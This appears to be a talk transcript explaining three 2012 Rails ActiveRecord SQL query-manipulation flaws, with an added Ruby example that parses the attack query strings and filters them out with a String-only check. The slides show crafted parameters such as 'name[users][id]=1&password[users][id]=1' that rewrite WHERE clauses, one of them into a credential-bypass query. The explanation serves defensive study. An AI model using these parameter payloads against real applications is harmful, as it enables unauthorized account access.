"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Programming
Transcript
Rails Vulnerabilities Last Week: CVE-2012-2660, CVE-2012-2661

CVE-2012-2660
Allows an unexpected "IS NULL" in queries. Affects Rails 2.x and 3.x.

ActiveRecord Query:
unless params[:name].nil?
  @user = User.where(:name => params[:name])
end

Query Parameters:
?name[]
{"name"=>[nil]}

ActiveRecord Query (with the parsed parameter substituted):
unless [nil].nil?
  @user = User.where(:name => [nil])
end

Resulting SQL:
SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of the WHERE clause via "dotted" query keys. Affects Rails 3.x.

ActiveRecord Query:
User.where(:name => params[:name])

ActiveRecord Query (dotted, table-qualified key form):
User.where("users.name" => params[:name])

Query Parameters:
?name[users.id]=1
{"name"=>{"users.id"=>"1"}}

ActiveRecord Query (with the parsed parameter substituted):
User.where(:name => {"users.id" => "1"})

Resulting SQL:
SELECT "users".* FROM "users" WHERE "users"."id" = 1

Unreleased Vulnerability
Allows some manipulation of the WHERE clause via nested hashes in query values. Affects Rails 2.3.x and 3.x.

ActiveRecord Query:
User.where(:name => params[:name], :password => params[:password])

Query Parameters:
?name[users][id]=1&password[users][id]=1
{"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query (with the parsed parameters substituted):
User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL:
SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
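All three slides share one root cause: the query string is parsed into nested Ruby structures (nil inside an Array, a Hash with a dotted key, a Hash nested in a Hash), and each of those shapes meant something different to where() than the plain String the controller expected. The Ruby below is an added example, not code from the deck or from Rails: parse_nested_query is a deliberately small stand-in for Rack's nested query parsing (only the key shapes shown on the slides are handled), and scalar_param is the check a controller of that era could apply so that only a String ever reaches the query. The User model in the trailing comment is hypothetical.

```ruby
require "cgi"

# Simplified stand-in (an assumption, not Rack's code) for nested query-string
# parsing: "name[users][id]=1" -> {"name"=>{"users"=>{"id"=>"1"}}}.
def parse_nested_query(query_string)
  params = {}
  query_string.split("&").each do |pair|
    next if pair.empty?
    raw_key, raw_value = pair.split("=", 2)
    key = CGI.unescape(raw_key)
    # "?name[]" carries no "=", so the value stays nil, which is what
    # produced [nil] on the CVE-2012-2660 slide.
    value = raw_value.nil? ? nil : CGI.unescape(raw_value)
    base = key[/\A[^\[]+/]                      # "name[users][id]" -> "name"
    subkeys = key.scan(/\[([^\]]*)\]/).flatten  # -> ["users", "id"]; "name[]" -> [""]
    assign_nested(params, [base] + subkeys, value)
  end
  params
end

def assign_nested(container, keys, value)
  key, *rest = keys
  if rest.empty?
    container[key] = value                   # plain scalar: name=alice
  elsif rest == [""]
    (container[key] ||= []) << value         # trailing []: name[] -> [nil]
  else
    container[key] ||= {}                    # dotted key or nested hash
    assign_nested(container[key], rest, value)
  end
  container
end

# Defensive check: where() treated nil, Array and Hash values very differently
# from a String, so accept nothing but a plain String for a scalar field.
def scalar_param(params, key)
  value = params[key]
  value.is_a?(String) ? value : nil
end

# How a controller would use the guard (User is a hypothetical model):
#   if (name = scalar_param(params, "name"))
#     @user = User.where(:name => name)
#   end

if __FILE__ == $0
  # Constructed inputs: the three query strings from the slides plus a benign one.
  ["name=alice", "name[]", "name[users.id]=1",
   "name[users][id]=1&password[users][id]=1"].each do |qs|
    parsed = parse_nested_query(qs)
    puts "#{qs.ljust(42)} -> #{parsed.inspect}"
    puts "#{' ' * 42}    accepted name: #{scalar_param(parsed, 'name').inspect}"
  end
end
```

Only "name=alice" yields a value that scalar_param lets through; the three payload shapes from the slides all parse to non-String values and are dropped before any query is built.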